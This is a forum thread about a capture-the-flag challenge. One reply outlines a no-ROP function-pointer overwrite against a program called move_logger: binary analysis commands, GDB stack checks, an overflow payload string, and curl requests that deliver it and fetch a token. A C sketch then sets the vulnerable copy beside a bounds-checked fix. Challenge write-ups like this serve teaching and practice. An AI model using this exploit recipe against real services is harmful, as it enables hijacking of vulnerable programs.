Forum Discussion
PRABAKARANRAMAMURTHY
Bronze III
24 days ago
Trick or Treat on Specter Street: Morphy's Mansion Challenge
I understand that the move_logger is the vulnerable program, and tried a few methods to exploit it. However, where is the token.txt? Anyone managed to find it?
"Whatever means necessary" is quite broad. Any hints from anyone?
1 Reply
- PRABAKARANRAMAMURTHY
Bronze III
For those who are looking for some hints:
The strategy was to use No-ROP Function-Pointer Overwrite. Following the steps below:
- Check Backend Health: curl -s http://x.x.x.x/api/health
- Analyze Vulnerable Binary:
  nm -C ./move_logger | grep rotate_old_logs
  objdump -d ./move_logger | awk '/<system@plt>/{print; getline; print}'
- Confirm Stack Layout in GDB (use PEDA and execute: p &moves, p &log to find the buffer size)
- Craft Overflow Payload:
  Payload: e4aaaaaaaaaaaaaaXXXXXX0000000000
- Exploit via API: curl POST
- Retrieve Token by using curl
Hope that helps.
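The bug class the reply describes, a fixed-size move buffer sitting next to a function pointer, as an added sketch with the vulnerable copy beside a bounds-checked one. This is example code written for this thread, not the challenge's move_logger source; the field names moves and log are assumed from the GDB commands in the reply, and the 16-byte buffer size and the sample input are constructed.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Hypothetical layout, not the real binary: a fixed-size buffer directly
 * followed by a function pointer, so an unbounded copy into the buffer
 * runs straight into the pointer. Size chosen for the example. */
#define MOVES_LEN 16

struct logger {
    char moves[MOVES_LEN];        /* assumed name, from the reply's "p &moves" */
    void (*log)(const char *);    /* assumed name, from the reply's "p &log"   */
};

static void default_log(const char *m) { printf("move: %s\n", m); }

/* Vulnerable pattern: strcpy trusts whatever length the caller sends,
 * so input longer than MOVES_LEN-1 overwrites lg->log. Shown only for
 * contrast; it is never called here. */
void record_move_unsafe(struct logger *lg, const char *input) {
    strcpy(lg->moves, input);
}

/* Hardened pattern: refuse input that does not fit, terminator included,
 * rather than silently truncating. memchr keeps this in standard C. */
bool record_move_safe(struct logger *lg, const char *input) {
    const char *nul = memchr(input, '\0', MOVES_LEN);
    if (nul == NULL)
        return false;             /* no terminator within the buffer size: too long */
    memcpy(lg->moves, input, (size_t)(nul - input) + 1);
    return true;
}

/* Detection helper: true if the pointer still targets the intended handler. */
bool log_pointer_intact(const struct logger *lg) {
    return lg->log == default_log;
}

int main(void) {
    struct logger lg = { "", default_log };
    const char *long_input = "e4aaaaaaaaaaaaaaXXXXXX0000000000"; /* constructed, 32 bytes */
    if (!record_move_safe(&lg, long_input))
        puts("rejected oversized move; log pointer untouched");
    printf("intact: %d\n", log_pointer_intact(&lg));
    return 0;
}
```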